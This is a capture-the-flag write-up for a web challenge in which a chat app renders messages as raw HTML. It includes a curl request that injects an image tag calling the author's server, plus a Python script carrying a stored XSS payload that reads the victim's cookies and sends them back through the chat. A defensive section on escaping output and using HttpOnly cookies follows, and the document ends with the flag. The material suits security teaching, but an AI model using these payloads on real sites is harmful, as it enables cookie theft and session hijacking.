Chatt with Bratt [Web]

After announcing that he would be having an anonymous 1-on-1 AMA with randomly chosen, adoring fans, an engineering team hacked together a web app and likely forgot to patch some obvious security holes.

Recon

Chat application. You send messages as "Anon" to a person named "Bratt Pitt", who reads them on the other side.

Sending a message that contains an image tag makes "Bratt Pitt" fetch a URL from our server, which confirms that message content is rendered as raw HTML (stored HTML injection):

# chat_id is the session identifier handed out by the app
export ses="b6489e18-6184-11ea-bf69-e6d97c3cba85"

# post a message whose HTML is rendered in Bratt's browser;
# the request for /bla shows up in our server logs
curl -svv 'http://web3.utctf.live:8080/chatt' \
    -H 'Content-Type: application/json' \
    -H "Cookie: chat_id=$ses; secret=none" \
    -d '{"content": "AAAA<img src=\"https://spotless.tech/bla\"/>"}'

Since we have stored XSS, we can read Bratt's cookies with an <input> tag: the autofocus attribute fires the onfocus handler without any user interaction, and the handler writes document.cookie into the chat's message box and calls the app's own sendMessage(), so the cookie comes back to us as an ordinary chat message.

import requests

# same session as above; the secret cookie is not needed on our side
cookies = {
    'chat_id': 'b6489e18-6184-11ea-bf69-e6d97c3cba85',
    'secret': 'none',
}

headers = {
    'Content-Type': 'application/json',
}

# the payload is stored as-is and rendered in Bratt's browser;
# autofocus triggers onfocus, which submits document.cookie via the chat UI
data = {
    "content": """

AAAAAAAAAA<input autofocus onfocus="document.getElementById('message').value = document.cookie;sendMessage();">

    """.strip()
}

response = requests.post('http://web3.utctf.live:8080/chatt', headers=headers, cookies=cookies, json=data)
print(response.status_code, response.text)

Bratt's browser then sends his cookie, which contains the flag, back to us through the chat.
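As an added defensive example, not part of the original writeup or the challenge's code, this shows how the chat backend could have neutralised both payloads above: escape message content before it is placed in HTML, mark the secret cookie HttpOnly so page script cannot read it, and flag stored messages that contain tags for review. The function names and the sample messages are constructed for this example.

```python
import html
import re

# Constructed sample chat messages: one benign, then the two payloads from the writeup.
MESSAGES = [
    "hello Bratt",
    'AAAA<img src="https://spotless.tech/bla"/>',
    "AAAAAAAAAA<input autofocus onfocus=\"document.getElementById('message')"
    ".value = document.cookie;sendMessage();\">",
]


def render_message(content: str) -> str:
    """Escape user-supplied text before interpolating it into the chat page.

    html.escape(quote=True) turns <, >, &, " and ' into entities, so the browser
    shows the payload as text instead of creating an <img> or <input> element.
    """
    return f'<div class="msg">{html.escape(content, quote=True)}</div>'


def secret_cookie_header(value: str) -> str:
    """Set-Cookie value for the secret: HttpOnly keeps it out of document.cookie,
    Secure restricts it to HTTPS, SameSite=Strict blocks cross-site sends."""
    return f"secret={value}; HttpOnly; Secure; SameSite=Strict; Path=/"


# Coarse detection heuristic for log review: any HTML start tag in a chat message.
# A plain "a < b" comparison does not match because a letter must follow "<" directly.
TAG_RE = re.compile(r"<[a-zA-Z][^>]*>")


def flag_suspicious(messages: list[str]) -> list[int]:
    """Return indices of messages containing an HTML tag."""
    return [i for i, m in enumerate(messages) if TAG_RE.search(m)]


if __name__ == "__main__":
    for m in MESSAGES:
        print(render_message(m))
    print("suspicious:", flag_suspicious(MESSAGES))
    print(secret_cookie_header("none"))
```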

Flag

utflag{95debad95cfb106081f33ceadc36bf9c}